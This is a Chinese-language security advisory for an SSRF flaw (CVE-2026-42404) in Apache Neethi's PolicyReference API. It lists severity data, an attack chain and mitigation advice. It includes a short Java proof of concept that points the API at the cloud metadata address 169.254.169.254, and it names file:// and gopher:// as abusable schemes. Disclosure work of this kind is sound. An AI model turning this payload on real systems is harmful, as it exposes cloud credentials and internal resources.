CVE-2026-42404 CVSS 6.5 中危

CVE-2026-42404 Apache Neethi 服务器端请求伪造漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42404

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Neethi

漏洞概述

Apache Neethi 在通过 PolicyReference API 获取远程策略引用时未对 URI 施加限制。攻击者可诱导应用向任意协议或内网 IP 发起请求，导致 SSRF。官方已在 3.2.2 版本中修复此问题。

技术细节

漏洞源于 PolicyReference API 缺乏对输入 URI 的校验。当应用调用该 API 并传入攻击者控制的 URI 时，Neethi 会直接发起请求。由于未限制协议（如 file://, gopher://）和目标地址（如 127.0.0.1），攻击者可读取本地文件、扫描内网或访问云元数据。利用无需认证且无交互。

攻击链分析

STEP 1

发现

攻击者识别出目标应用使用了Apache Neethi库，并且存在通过PolicyReference API接收外部URI参数的接口。

STEP 2

构造载荷

攻击者构造包含恶意URI（如内网IP地址、file://协议或云元数据地址）的请求参数。

STEP 3

发送请求

攻击者将恶意载荷发送给目标应用，应用解析并调用PolicyReference API处理该URI。

STEP 4

执行攻击

Neethi库向攻击者指定的内部资源发起出站请求，导致信息泄露或内网探测。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import org.apache.neethi.Policy;
import org.apache.neethi.PolicyEngine;
import java.net.URI;

public class PoC {
    public static void main(String[] args) {
        try {
            // Malicious URI targeting internal metadata service (SSRF)
            String targetUri = "http://169.254.169.254/latest/meta-data/";
            
            // Triggering the vulnerable API call
            Policy policy = PolicyEngine.getPolicy(new URI(targetUri));
            
            System.out.println("Request sent to: " + targetUri);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

影响范围

Apache Neethi < 3.2.2

防御指南

临时缓解措施

若无法立即升级，应在应用层面对所有传入PolicyReference API的URI参数进行过滤，禁止内网IP段（如127.0.0.0/8, 10.0.0.0/8等）和非HTTP(S)协议的访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表